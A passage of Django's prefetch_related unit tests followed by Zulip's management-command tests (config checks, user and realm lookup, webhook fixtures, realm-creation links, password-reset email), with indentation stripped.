qs = TaggedItem.objects.filter(content_type=ct, tag='awesome').prefetch_related('content_object__read_by')
readers_of_awesome_books = {r.name for tag in qs
for r in tag.content_object.read_by.all()}
self.assertEqual(readers_of_awesome_books, {"me", "you", "someone"})
def test_nullable_GFK(self):
TaggedItem.objects.create(tag="awesome", content_object=self.book1,
created_by=self.reader1)
TaggedItem.objects.create(tag="great", content_object=self.book2)
TaggedItem.objects.create(tag="rubbish", content_object=self.book3)
with self.assertNumQueries(2):
result = [t.created_by for t in TaggedItem.objects.prefetch_related('created_by')]
self.assertEqual(result,
[t.created_by for t in TaggedItem.objects.all()])
def test_generic_relation(self):
bookmark = Bookmark.objects.create(url='http://www.djangoproject.com/')
TaggedItem.objects.create(content_object=bookmark, tag='django')
TaggedItem.objects.create(content_object=bookmark, tag='python')
with self.assertNumQueries(2):
tags = [t.tag for b in Bookmark.objects.prefetch_related('tags')
for t in b.tags.all()]
self.assertEqual(sorted(tags), ["django", "python"])
def test_charfield_GFK(self):
b = Bookmark.objects.create(url='http://www.djangoproject.com/')
TaggedItem.objects.create(content_object=b, tag='django')
TaggedItem.objects.create(content_object=b, favorite=b, tag='python')
with self.assertNumQueries(3):
bookmark = Bookmark.objects.filter(pk=b.pk).prefetch_related('tags', 'favorite_tags')[0]
self.assertEqual(sorted(i.tag for i in bookmark.tags.all()), ["django", "python"])
self.assertEqual([i.tag for i in bookmark.favorite_tags.all()], ["python"])
def test_custom_queryset(self):
bookmark = Bookmark.objects.create(url='http://www.djangoproject.com/')
django_tag = TaggedItem.objects.create(content_object=bookmark, tag='django')
TaggedItem.objects.create(content_object=bookmark, tag='python')
with self.assertNumQueries(2):
bookmark = Bookmark.objects.prefetch_related(
Prefetch('tags', TaggedItem.objects.filter(tag='django')),
).get()
with self.assertNumQueries(0):
self.assertEqual(list(bookmark.tags.all()), [django_tag])
# The custom queryset filters should be applied to the queryset
# instance returned by the manager.
self.assertEqual(list(bookmark.tags.all()), list(bookmark.tags.all().all()))
class MultiTableInheritanceTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.book1 = BookWithYear.objects.create(title='Poems', published_year=2010)
cls.book2 = BookWithYear.objects.create(title='More poems', published_year=2011)
cls.author1 = AuthorWithAge.objects.create(name='Jane', first_book=cls.book1, age=50)
cls.author2 = AuthorWithAge.objects.create(name='Tom', first_book=cls.book1, age=49)
cls.author3 = AuthorWithAge.objects.create(name='Robert', first_book=cls.book2, age=48)
cls.author_address = AuthorAddress.objects.create(author=cls.author1, address='SomeStreet 1')
cls.book2.aged_authors.add(cls.author2, cls.author3)
cls.br1 = BookReview.objects.create(book=cls.book1, notes='review book1')
cls.br2 = BookReview.objects.create(book=cls.book2, notes='review book2')
def test_foreignkey(self):
with self.assertNumQueries(2):
qs = AuthorWithAge.objects.prefetch_related('addresses')
addresses = [[str(address) for address in obj.addresses.all()] for obj in qs]
self.assertEqual(addresses, [[str(self.author_address)], [], []])
def test_foreignkey_to_inherited(self):
with self.assertNumQueries(2):
qs = BookReview.objects.prefetch_related('book')
titles = [obj.book.title for obj in qs]
self.assertEqual(titles, ["Poems", "More poems"])
def test_m2m_to_inheriting_model(self):
qs = AuthorWithAge.objects.prefetch_related('books_with_year')
with self.assertNumQueries(2):
lst = [[str(book) for book in author.books_with_year.all()] for author in qs]
qs = AuthorWithAge.objects.all()
lst2 = [[str(book) for book in author.books_with_year.all()] for author in qs]
self.assertEqual(lst, lst2)
qs = BookWithYear.objects.prefetch_related('aged_authors')
with self.assertNumQueries(2):
lst = [[str(author) for author in book.aged_authors.all()] for book in qs]
qs = BookWithYear.objects.all()
lst2 = [[str(author) for author in book.aged_authors.all()] for book in qs]
self.assertEqual(lst, lst2)
def test_parent_link_prefetch(self):
with self.assertNumQueries(2):
[a.author for a in AuthorWithAge.objects.prefetch_related('author')]
@override_settings(DEBUG=True)
def test_child_link_prefetch(self):
with self.assertNumQueries(2):
authors = [a.authorwithage for a in Author.objects.prefetch_related('authorwithage')]
# Regression for #18090: the prefetching query must include an IN clause.
# Note that on Oracle the table name is upper case in the generated SQL,
# thus the .lower() call.
self.assertIn('authorwithage', connection.queries[-1]['sql'].lower())
self.assertIn(' IN ', connection.queries[-1]['sql'])
self.assertEqual(authors, [a.authorwithage for a in Author.objects.all()])
class ForeignKeyToFieldTest(TestCase):
@classmethod
def setUpTestData(cls):
cls.book = Book.objects.create(title='Poems')
cls.author1 = Author.objects.create(name='Jane', first_book=cls.book)
cls.author2 = Author.objects.create(name='Tom', first_book=cls.book)
cls.author3 = Author.objects.create(name='Robert', first_book=cls.book)
cls.author_address = AuthorAddress.objects.create(author=cls.author1, address='SomeStreet 1')
FavoriteAuthors.objects.create(author=cls.author1, likes_author=cls.author2)
FavoriteAuthors.objects.create(author=cls.author2, likes_author=cls.author3)
FavoriteAuthors.objects.create(author=cls.author3, likes_author=cls.author1)
def test_foreignkey(self):
with self.assertNumQueries(2):
qs = Author.objects.prefetch_related('addresses')
addresses = [[str(address) for address in obj.addresses.all()]
for obj in qs]
self.assertEqual(addresses, [[str(self.author_address)], [], []])
def test_m2m(self):
with self.assertNumQueries(3):
qs = Author.objects.all().prefetch_related('favorite_authors', 'favors_me')
favorites = [(
[str(i_like) for i_like in author.favorite_authors.all()],
[str(likes_me) for likes_me in author.favors_me.all()]
) for author in qs]
self.assertEqual(
favorites,
[
([str(self.author2)], [str(self.author3)]),
([str(self.author3)], [str(self.author1)]),
([str(self.author1)], [str(self.author2)])
]
)
class LookupOrderingTest(TestCase):
"""
Test cases that demonstrate that ordering of lookups is important, and
ensure it is preserved.
"""
def setUp(self):
self.person1 = Person.objects.create(name="Joe")
self.person2 = Person.objects.create(name="Mary")
# Set main_room for each house before creating the next one for
# databases where supports_nullable_unique_constraints is False.
self.house1 = House.objects.create(address="123 Main St")
self.room1_1 = Room.objects.create(name="Dining room", house=self.house1)
self.room1_2 = Room.objects.create(name="Lounge", house=self.house1)
self.room1_3 = Room.objects.create(name="Kitchen", house=self.house1)
self.house1.main_room = self.room1_1
self.house1.save()
self.person1.houses.add(self.house1)
self.house2 = House.objects.create(address="45 Side St")
self.room2_1 = Room.objects.create(name="Dining room", house=self.house2)
self.room2_2 = Room.objects.create(name="Lounge", house=self.house2)
self.house2.main_room = self.room2_1
self.house2.save()
self.person1.houses.add(self.house2)
self.house3 = House.objects.create(address="6 Downing St")
self.room3_1 = Room.objects.create(name="Dining room", house=self.house3)
self.room3_2 = Room.objects.create(name="Lounge", house=self.house3)
self.room3_3 = Room.objects.create(name="Kitchen", house=self.house3)
self.house3.main_room = self.room3_1
self.house3.save()
self.person2.houses.add(self.house3)
self.house4 = House.objects.create(address="7 Regents St")
self.room4_1 = Room.objects.create(name="Dining room", house=self.house4)
self.room4_2 = Room.objects.create(name="Lounge", house=self.house4)
self.house4.main_room = self.room4_1
self.house4.save()
self.person2.houses.add(self.house4)
def test_order(self):
with self.assertNumQueries(4):
# The following two queries must be done in the same order as written,
# otherwise 'primary_house' will cause non-prefetched lookups
qs = Person.objects.prefetch_related('houses__rooms',
'primary_house__occupants')
[list(p.primary_house.occupants.all()) for p in qs]
class NullableTest(TestCase):
@classmethod
def setUpTestData(cls):
boss = Employee.objects.create(name="Peter")
Employee.objects.create(name="Joe", boss=boss)
Employee.objects.create(name="Angela", boss=boss)
def test_traverse_nullable(self):
# Because we use select_related() for 'boss', it doesn't need to be
# prefetched, but we can still traverse it although it contains some nulls
with self.assertNumQueries(2):
qs = Employee.objects.select_related('boss').prefetch_related('boss__serfs')
co_serfs = [list(e.boss.serfs.all()) if e.boss is not None else []
for e in qs]
qs2 = Employee.objects.select_related('boss')
co_serfs2 = [list(e.boss.serfs.all()) if e.boss is not None else [] for e in qs2]
self.assertEqual(co_serfs, co_serfs2)
def test_prefetch_nullable(self):
# One for main employee, one for boss, one for serfs
with self.assertNumQueries(3):
qs = Employee.objects.prefetch_related('boss__serfs')
co_serfs = [list(e.boss.serfs.all()) if e.boss is not None else []
for e in qs]
qs2 = Employee.objects.all()
co_serfs2 = [list(e.boss.serfs.all()) if e.boss is not None else [] for e in qs2]
self.assertEqual(co_serfs, co_serfs2)
def test_in_bulk(self):
"""
In-bulk does correctly prefetch objects by not using .iterator()
directly.
"""
boss1 = Employee.objects.create(name="Peter")
boss2 = Employee.objects.create(name="Jack")
with self.assertNumQueries(2):
# Prefetch is done and it does not cause any errors.
bulk = Employee.objects.prefetch_related('serfs').in_bulk([boss1.pk, boss2.pk])
for b in bulk.values():
list(b.serfs.all())
class MultiDbTests(TestCase):
multi_db = True
def test_using_is_honored_m2m(self):
B = Book.objects.using('other')
A = Author.objects.using('other')
book1 = B.create(title="Poems")
book2 = B.create(title="Jane Eyre")
book3 = B.create(title="Wuthering Heights")
book4 = B.create(title="Sense and Sensibility")
author1 = A.create(name="Charlotte", first_book=book1)
author2 = A.create(name="Anne", first_book=book1)
author3 = A.create(name="Emily", first_book=book1)
author4 = A.create(name="Jane", first_book=book4)
book1.authors.add(author1, author2, author3)
book2.authors.add(author1)
book3.authors.add(author3)
book4.authors.add(author4)
# Forward
qs1 = B.prefetch_related('authors')
with self.assertNumQueries(2, using='other'):
books = "".join("%s (%s)\n" %
(book.title, ", ".join(a.name for a in book.authors.all()))
for book in qs1)
self.assertEqual(books,
"Poems (Charlotte, Anne, Emily)\n"
"Jane Eyre (Charlotte)\n"
"Wuthering Heights (Emily)\n"
"Sense and Sensibility (Jane)\n")
# Reverse
qs2 = A.prefetch_related('books')
with self.assertNumQueries(2, using='other'):
authors = "".join("%s: %s\n" %
(author.name, ", ".join(b.title for b in author.books.all()))
for author in qs2)
self.assertEqual(authors,
"Charlotte: Poems, Jane Eyre\n"
"Anne: Poems\n"
"Emily: Poems, Wuthering Heights\n"
"Jane: Sense and Sensibility\n")
def test_using_is_honored_fkey(self):
B = Book.objects.using('other')
A = Author.objects.using('other')
book1 = B.create(title="Poems")
book2 = B.create(title="Sense and Sensibility")
A.create(name="Charlotte Bronte", first_book=book1)
A.create(name="Jane Austen", first_book=book2)
# Forward
with self.assertNumQueries(2, using='other'):
books = ", ".join(a.first_book.title for a in A.prefetch_related('first_book'))
self.assertEqual("Poems, Sense and Sensibility", books)
# Reverse
with self.assertNumQueries(2, using='other'):
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related('first_time_authors'))
self.assertEqual(books,
"Poems (Charlotte Bronte)\n"
"Sense and Sensibility (Jane Austen)\n")
def test_using_is_honored_inheritance(self):
B = BookWithYear.objects.using('other')
A = AuthorWithAge.objects.using('other')
book1 = B.create(title="Poems", published_year=2010)
B.create(title="More poems", published_year=2011)
A.create(name='Jane', first_book=book1, age=50)
A.create(name='Tom', first_book=book1, age=49)
# parent link
with self.assertNumQueries(2, using='other'):
authors = ", ".join(a.author.name for a in A.prefetch_related('author'))
self.assertEqual(authors, "Jane, Tom")
# child link
with self.assertNumQueries(2, using='other'):
ages = ", ".join(str(a.authorwithage.age) for a in A.prefetch_related('authorwithage'))
self.assertEqual(ages, "50, 49")
def test_using_is_honored_custom_qs(self):
B = Book.objects.using('other')
A = Author.objects.using('other')
book1 = B.create(title="Poems")
book2 = B.create(title="Sense and Sensibility")
A.create(name="Charlotte Bronte", first_book=book1)
A.create(name="Jane Austen", first_book=book2)
# Implicit hinting
with self.assertNumQueries(2, using='other'):
prefetch = Prefetch('first_time_authors', queryset=Author.objects.all())
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related(prefetch))
self.assertEqual(books,
"Poems (Charlotte Bronte)\n"
"Sense and Sensibility (Jane Austen)\n")
# Explicit using on the same db.
with self.assertNumQueries(2, using='other'):
prefetch = Prefetch('first_time_authors', queryset=Author.objects.using('other'))
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related(prefetch))
self.assertEqual(books,
"Poems (Charlotte Bronte)\n"
"Sense and Sensibility (Jane Austen)\n")
# Explicit using on a different db.
with self.assertNumQueries(1, using='default'), self.assertNumQueries(1, using='other'):
prefetch = Prefetch('first_time_authors', queryset=Author.objects.using('default'))
books = "".join("%s (%s)\n" %
(b.title, ", ".join(a.name for a in b.first_time_authors.all()))
for b in B.prefetch_related(prefetch))
self.assertEqual(books,
"Poems ()\n"
"Sense and Sensibility ()\n")
class Ticket19607Tests(TestCase):
def setUp(self):
for id, name1, name2 in [
(1, 'einfach', 'simple'),
(2, 'schwierig', 'difficult'),
]:
LessonEntry.objects.create(id=id, name1=name1, name2=name2)
for id, lesson_entry_id, name in [
(1, 1, 'einfach'),
(2, 1, 'simple'),
(3, 2, 'schwierig'),
(4, 2, 'difficult'),
]:
WordEntry.objects.create(id=id, lesson_entry_id=lesson_entry_id, name=name)
def test_bug(self):
list(WordEntry.objects.prefetch_related('lesson_entry', 'lesson_entry__wordentry_set'))
class Ticket21410Tests(TestCase):
def setUp(self):
self.book1 = Book.objects.create(title="Poems")
self.book2 = Book.objects.create(title="Jane Eyre")
self.book3 = Book.objects.create(title="Wuthering Heights")
self.book4 = Book.objects.create(title="Sense and Sensibility")
self.author1 = Author2.objects.create(name="Charlotte", first_book=self.book1)
self.author2 = Author2.objects.create(name="Anne", first_book=self.book1)
self.author3 = Author2.objects.create(name="Emily", first_book=self.book1)
self.author4 = Author2.objects.create(name="Jane", first_book=self.book4)
self.author1.favorite_books.add(self.book1, self.book2, self.book3)
self.author2.favorite_books.add(self.book1)
self.author3.favorite_books.add(self.book2)
self.author4.favorite_books.add(self.book3)
def test_bug(self):
list(Author2.objects.prefetch_related('first_book', 'favorite_books'))
class Ticket21760Tests(TestCase):
def setUp(self):
self.rooms = []
for _ in range(3):
house = House.objects.create()
for _ in range(3):
self.rooms.append(Room.objects.create(house=house))
# Set main_room for each house before creating the next one for
# databases where supports_nullable_unique_constraints is False.
house.main_room = self.rooms[-3]
house.save()
def test_bug(self):
prefetcher = get_prefetcher(self.rooms[0], 'house', 'house')[0]
queryset = prefetcher.get_prefetch_queryset(list(Room.objects.all()))[0]
self.assertNotIn(' JOIN ', str(queryset.query))
class DirectPrefechedObjectCacheReuseTests(TestCase):
"""
prefetch_related() reuses objects fetched in _prefetched_objects_cache.
When objects are prefetched and not stored as an instance attribute (often
intermediary relationships), they are saved to the
_prefetched_objects_cache attribute. prefetch_related() takes
_prefetched_objects_cache into account when determining whether an object
has been fetched[1] and retrieves results from it when it is populated [2].
[1]: #25546 (duplicate queries on nested Prefetch)
[2]: #27554 (queryset evaluation fails with a mix of nested and flattened
prefetches)
"""
@classmethod
def setUpTestData(cls):
cls.book1, cls.book2 = [
Book.objects.create(title='book1'),
Book.objects.create(title='book2'),
]
cls.author11, cls.author12, cls.author21 = [
Author.objects.create(first_book=cls.book1, name='Author11'),
Author.objects.create(first_book=cls.book1, name='Author12'),
Author.objects.create(first_book=cls.book2, name='Author21'),
]
cls.author1_address1, cls.author1_address2, cls.author2_address1 = [
AuthorAddress.objects.create(author=cls.author11, address='Happy place'),
AuthorAddress.objects.create(author=cls.author12, address='Haunted house'),
AuthorAddress.objects.create(author=cls.author21, address='Happy place'),
]
cls.bookwithyear1 = BookWithYear.objects.create(title='Poems', published_year=2010)
cls.bookreview1 = BookReview.objects.create(book=cls.bookwithyear1)
def test_detect_is_fetched(self):
"""
Nested prefetch_related() shouldn't trigger duplicate queries for the same
lookup.
"""
with self.assertNumQueries(3):
books = Book.objects.filter(
title__in=['book1', 'book2'],
).prefetch_related(
Prefetch(
'first_time_authors',
Author.objects.prefetch_related(
Prefetch(
'addresses',
AuthorAddress.objects.filter(address='Happy place'),
)
),
),
)
book1, book2 = list(books)
with self.assertNumQueries(0):
self.assertSequenceEqual(book1.first_time_authors.all(), [self.author11, self.author12])
self.assertSequenceEqual(book2.first_time_authors.all(), [self.author21])
self.assertSequenceEqual(book1.first_time_authors.all()[0].addresses.all(), [self.author1_address1])
self.assertSequenceEqual(book1.first_time_authors.all()[1].addresses.all(), [])
self.assertSequenceEqual(book2.first_time_authors.all()[0].addresses.all(), [self.author2_address1])
self.assertEqual(
list(book1.first_time_authors.all()), list(book1.first_time_authors.all().all())
)
self.assertEqual(
list(book2.first_time_authors.all()), list(book2.first_time_authors.all().all())
)
self.assertEqual(
list(book1.first_time_authors.all()[0].addresses.all()),
list(book1.first_time_authors.all()[0].addresses.all().all())
)
self.assertEqual(
list(book1.first_time_authors.all()[1].addresses.all()),
list(book1.first_time_authors.all()[1].addresses.all().all())
)
self.assertEqual(
list(book2.first_time_authors.all()[0].addresses.all()),
list(book2.first_time_authors.all()[0].addresses.all().all())
)
def test_detect_is_fetched_with_to_attr(self):
with self.assertNumQueries(3):
books = Book.objects.filter(
title__in=['book1', 'book2'],
).prefetch_related(
Prefetch(
'first_time_authors',
Author.objects.prefetch_related(
Prefetch(
'addresses',
AuthorAddress.objects.filter(address='Happy place'),
to_attr='happy_place',
)
),
to_attr='first_authors',
),
)
book1, book2 = list(books)
with self.assertNumQueries(0):
self.assertEqual(book1.first_authors, [self.author11, self.author12])
self.assertEqual(book2.first_authors, [self.author21])
self.assertEqual(book1.first_authors[0].happy_place, [self.author1_address1])
self.assertEqual(book1.first_authors[1].happy_place, [])
self.assertEqual(book2.first_authors[0].happy_place, [self.author2_address1])
def test_prefetch_reverse_foreign_key(self):
with self.assertNumQueries(2):
bookwithyear1, = BookWithYear.objects.prefetch_related('bookreview_set')
with self.assertNumQueries(0):
self.assertCountEqual(bookwithyear1.bookreview_set.all(), [self.bookreview1])
with self.assertNumQueries(0):
prefetch_related_objects([bookwithyear1], 'bookreview_set')
def test_add_clears_prefetched_objects(self):
bookwithyear = BookWithYear.objects.get(pk=self.bookwithyear1.pk)
prefetch_related_objects([bookwithyear], 'bookreview_set')
self.assertCountEqual(bookwithyear.bookreview_set.all(), [self.bookreview1])
new_review = BookReview.objects.create()
bookwithyear.bookreview_set.add(new_review)
self.assertCountEqual(bookwithyear.bookreview_set.all(), [self.bookreview1, new_review])
def test_remove_clears_prefetched_objects(self):
bookwithyear = BookWithYear.objects.get(pk=self.bookwithyear1.pk)
prefetch_related_objects([bookwithyear], 'bookreview_set')
self.assertCountEqual(bookwithyear.bookreview_set.all(), [self.bookreview1])
bookwithyear.bookreview_set.remove(self.bookreview1)
self.assertCountEqual(bookwithyear.bookreview_set.all(), [])
class ReadPrefetchedObjectsCacheTests(TestCase):
@classmethod
def setUpTestData(cls):
cls.book1 = Book.objects.create(title='Les confessions Volume I')
cls.book2 = Book.objects.create(title='Candide')
cls.author1 = AuthorWithAge.objects.create(name='Rousseau', first_book=cls.book1, age=70)
cls.author2 = AuthorWithAge.objects.create(name='Voltaire', first_book=cls.book2, age=65)
cls.book1.authors.add(cls.author1)
cls.book2.authors.add(cls.author2)
FavoriteAuthors.objects.create(author=cls.author1, likes_author=cls.author2)
def test_retrieves_results_from_prefetched_objects_cache(self):
"""
When intermediary results are prefetched without a destination
attribute, they are saved in the RelatedManager's cache
(_prefetched_objects_cache). prefetch_related() uses this cache
(#27554).
"""
authors = AuthorWithAge.objects.prefetch_related(
Prefetch(
'author',
queryset=Author.objects.prefetch_related(
# Results are saved in the RelatedManager's cache
# (_prefetched_objects_cache) and do not replace the
# RelatedManager on Author instances (favorite_authors)
Prefetch('favorite_authors__first_book'),
),
),
)
with self.assertNumQueries(4):
# AuthorWithAge -> Author -> FavoriteAuthors, Book
self.assertQuerysetEqual(authors, ['<AuthorWithAge: Rousseau>', '<AuthorWithAge: Voltaire>'])
|
the-stack_106_12991
|
# -*- coding: utf-8 -*-
import glob
import os
import re
from datetime import timedelta
from email.utils import parseaddr
from mock import MagicMock, patch, call
from typing import List, Dict, Any, Optional
from django.conf import settings
from django.core.management import call_command
from django.test import TestCase, override_settings
from zerver.lib.actions import do_create_user, do_deactivate_realm, do_reactivate_realm
from zerver.lib.management import ZulipBaseCommand, CommandError, check_config
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import stdout_suppressed
from zerver.lib.test_runner import slow
from zerver.models import get_user_profile_by_email
from zerver.models import get_realm, UserProfile, Realm
from confirmation.models import RealmCreationKey, generate_realm_creation_url
class TestCheckConfig(ZulipTestCase):
def test_check_config(self) -> None:
with self.assertRaisesRegex(CommandError, "Error: You must set ZULIP_ADMINISTRATOR in /etc/zulip/settings.py."):
check_config()
with self.settings(REQUIRED_SETTINGS=[('asdf', 'not asdf')]):
with self.assertRaisesRegex(CommandError, "Error: You must set asdf in /etc/zulip/settings.py."):
check_config()
@override_settings(WARN_NO_EMAIL=True)
def test_check_send_email(self) -> None:
with self.assertRaisesRegex(CommandError, "Outgoing email not yet configured, see"):
call_command("send_test_email", '[email protected]')
class TestZulipBaseCommand(ZulipTestCase):
def setUp(self) -> None:
self.zulip_realm = get_realm("zulip")
self.command = ZulipBaseCommand()
def test_get_client(self) -> None:
self.assertEqual(self.command.get_client().name, "ZulipServer")
def test_get_realm(self) -> None:
self.assertEqual(self.command.get_realm(dict(realm_id='zulip')), self.zulip_realm)
self.assertEqual(self.command.get_realm(dict(realm_id=None)), None)
self.assertEqual(self.command.get_realm(dict(realm_id='1')), self.zulip_realm)
with self.assertRaisesRegex(CommandError, "There is no realm with id"):
self.command.get_realm(dict(realm_id='17'))
with self.assertRaisesRegex(CommandError, "There is no realm with id"):
self.command.get_realm(dict(realm_id='mit'))
def test_get_user(self) -> None:
mit_realm = get_realm("zephyr")
user_profile = self.example_user("hamlet")
email = user_profile.email
self.assertEqual(self.command.get_user(email, self.zulip_realm), user_profile)
self.assertEqual(self.command.get_user(email, None), user_profile)
error_message = "The realm '<Realm: zephyr 2>' does not contain a user with email"
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_user(email, mit_realm)
with self.assertRaisesRegex(CommandError, "server does not contain a user with email"):
self.command.get_user('[email protected]', None)
do_create_user(email, 'password', mit_realm, 'full_name', 'short_name')
with self.assertRaisesRegex(CommandError, "server contains multiple users with that email"):
self.command.get_user(email, None)
def test_get_user_profile_by_email(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.email
self.assertEqual(get_user_profile_by_email(email), user_profile)
def get_users_sorted(self, options: Dict[str, Any], realm: Optional[Realm]) -> List[UserProfile]:
user_profiles = self.command.get_users(options, realm)
return sorted(user_profiles, key = lambda x: x.email)
def test_get_users(self) -> None:
user_emails = self.example_email("hamlet") + "," + self.example_email("iago")
expected_user_profiles = [self.example_user("hamlet"), self.example_user("iago")]
user_profiles = self.get_users_sorted(dict(users=user_emails), self.zulip_realm)
self.assertEqual(user_profiles, expected_user_profiles)
user_profiles = self.get_users_sorted(dict(users=user_emails), None)
self.assertEqual(user_profiles, expected_user_profiles)
user_emails = self.example_email("iago") + "," + self.mit_email("sipbtest")
expected_user_profiles = [self.example_user("iago"), self.mit_user("sipbtest")]
user_profiles = self.get_users_sorted(dict(users=user_emails), None)
self.assertEqual(user_profiles, expected_user_profiles)
error_message = "The realm '<Realm: zulip 1>' does not contain a user with email"
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=user_emails), self.zulip_realm)
self.assertEqual(self.command.get_users(dict(users=self.example_email("iago")), self.zulip_realm),
[self.example_user("iago")])
self.assertEqual(self.command.get_users(dict(users=None), None), [])
def test_get_users_with_all_users_argument_enabled(self) -> None:
user_emails = self.example_email("hamlet") + "," + self.example_email("iago")
expected_user_profiles = [self.example_user("hamlet"), self.example_user("iago")]
user_profiles = self.get_users_sorted(dict(users=user_emails, all_users=False), self.zulip_realm)
self.assertEqual(user_profiles, expected_user_profiles)
error_message = "You can't use both -u/--users and -a/--all-users."
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=user_emails, all_users=True), None)
expected_user_profiles = sorted(UserProfile.objects.filter(realm=self.zulip_realm),
key = lambda x: x.email)
user_profiles = self.get_users_sorted(dict(users=None, all_users=True), self.zulip_realm)
self.assertEqual(user_profiles, expected_user_profiles)
error_message = "You have to pass either -u/--users or -a/--all-users."
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=None, all_users=False), None)
error_message = "The --all-users option requires a realm; please pass --realm."
with self.assertRaisesRegex(CommandError, error_message):
self.command.get_users(dict(users=None, all_users=True), None)
class TestCommandsCanStart(TestCase):
def setUp(self) -> None:
self.commands = filter(
lambda filename: filename != '__init__',
map(
lambda file: os.path.basename(file).replace('.py', ''),
glob.iglob('*/management/commands/*.py')
)
)
@slow("Aggregate of runs dozens of individual --help tests")
def test_management_commands_show_help(self) -> None:
with stdout_suppressed() as stdout:
for command in self.commands:
print('Testing management command: {}'.format(command),
file=stdout)
with self.assertRaises(SystemExit):
call_command(command, '--help')
# zerver/management/commands/runtornado.py sets this to True;
# we need to reset it here. See #3685 for details.
settings.RUNNING_INSIDE_TORNADO = False
class TestSendWebhookFixtureMessage(TestCase):
COMMAND_NAME = 'send_webhook_fixture_message'
def setUp(self) -> None:
self.fixture_path = os.path.join('some', 'fake', 'path.json')
self.url = '/some/url/with/hook'
@patch('zerver.management.commands.send_webhook_fixture_message.Command.print_help')
def test_check_if_command_exits_when_fixture_param_is_empty(self, print_help_mock: MagicMock) -> None:
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, url=self.url)
print_help_mock.assert_any_call('./manage.py', self.COMMAND_NAME)
@patch('zerver.management.commands.send_webhook_fixture_message.Command.print_help')
def test_check_if_command_exits_when_url_param_is_empty(self, print_help_mock: MagicMock) -> None:
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, fixture=self.fixture_path)
print_help_mock.assert_any_call('./manage.py', self.COMMAND_NAME)
@patch('zerver.management.commands.send_webhook_fixture_message.os.path.exists')
def test_check_if_command_exits_when_fixture_path_does_not_exist(
self, os_path_exists_mock: MagicMock) -> None:
os_path_exists_mock.return_value = False
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, fixture=self.fixture_path, url=self.url)
os_path_exists_mock.assert_any_call(os.path.join(settings.DEPLOY_ROOT, self.fixture_path))
@patch('zerver.management.commands.send_webhook_fixture_message.os.path.exists')
@patch('zerver.management.commands.send_webhook_fixture_message.Client')
@patch('zerver.management.commands.send_webhook_fixture_message.ujson')
@patch("zerver.management.commands.send_webhook_fixture_message.open", create=True)
def test_check_if_command_post_request_to_url_with_fixture(self,
open_mock: MagicMock,
ujson_mock: MagicMock,
client_mock: MagicMock,
os_path_exists_mock: MagicMock) -> None:
ujson_mock.loads.return_value = '{}'
ujson_mock.dumps.return_value = {}
os_path_exists_mock.return_value = True
client = client_mock()
with self.assertRaises(SystemExit):
call_command(self.COMMAND_NAME, fixture=self.fixture_path, url=self.url)
self.assertTrue(ujson_mock.dumps.called)
self.assertTrue(ujson_mock.loads.called)
self.assertTrue(open_mock.called)
client.post.assert_called_once_with(self.url, {}, content_type="application/json",
HTTP_HOST="zulip.testserver")
class TestGenerateRealmCreationLink(ZulipTestCase):
COMMAND_NAME = "generate_realm_creation_link"
@override_settings(OPEN_REALM_CREATION=False)
def test_generate_link_and_create_realm(self) -> None:
email = "[email protected]"
generated_link = generate_realm_creation_url(by_admin=True)
# Get realm creation page
result = self.client_get(generated_link)
self.assert_in_success_response([u"Create a new Zulip organization"], result)
# Enter email
self.assertIsNone(get_realm('test'))
result = self.client_post(generated_link, {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(re.search(r'/accounts/do_confirm/\w+$', result["Location"]))
# Bypass sending mail for confirmation, go straight to creation form
result = self.client_get(result["Location"])
self.assert_in_response('action="/accounts/register/"', result)
# Original link is now dead
result = self.client_get(generated_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
@override_settings(OPEN_REALM_CREATION=False)
def test_generate_link_confirm_email(self) -> None:
email = "[email protected]"
generated_link = generate_realm_creation_url(by_admin=False)
result = self.client_post(generated_link, {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(re.search('/accounts/new/send_confirm/{}$'.format(email),
result["Location"]))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email so we can get started", result)
# Original link is now dead
result = self.client_get(generated_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
@override_settings(OPEN_REALM_CREATION=False)
def test_realm_creation_with_random_link(self) -> None:
# Realm creation attempt with an invalid link should fail
random_link = "/new/5e89081eb13984e0f3b130bf7a4121d153f1614b"
result = self.client_get(random_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
@override_settings(OPEN_REALM_CREATION=False)
def test_realm_creation_with_expired_link(self) -> None:
generated_link = generate_realm_creation_url(by_admin=True)
key = generated_link[-24:]
# Manually expire the link by changing the date of creation
obj = RealmCreationKey.objects.get(creation_key=key)
obj.date_created = obj.date_created - timedelta(days=settings.REALM_CREATION_LINK_VALIDITY_DAYS + 1)
obj.save()
result = self.client_get(generated_link)
self.assert_in_success_response(["The organization creation link has expired or is not valid."], result)
class TestCalculateFirstVisibleMessageID(ZulipTestCase):
COMMAND_NAME = 'calculate_first_visible_message_id'
def test_check_if_command_calls_maybe_update_first_visible_message_id(self) -> None:
with patch('zerver.lib.message.maybe_update_first_visible_message_id') as m:
call_command(self.COMMAND_NAME, "--realm=zulip", "--lookback-hours=30")
m.assert_called_with(get_realm("zulip"), 30)
with patch('zerver.lib.message.maybe_update_first_visible_message_id') as m:
call_command(self.COMMAND_NAME, "--lookback-hours=35")
calls = [call(realm, 35) for realm in Realm.objects.all()]
m.has_calls(calls, any_order=True)
class TestPasswordRestEmail(ZulipTestCase):
COMMAND_NAME = "send_password_reset_email"
def test_if_command_sends_password_reset_email(self) -> None:
call_command(self.COMMAND_NAME, users=self.example_email("iago"))
from django.core.mail import outbox
from_email = outbox[0].from_email
self.assertIn("Zulip Account Security", from_email)
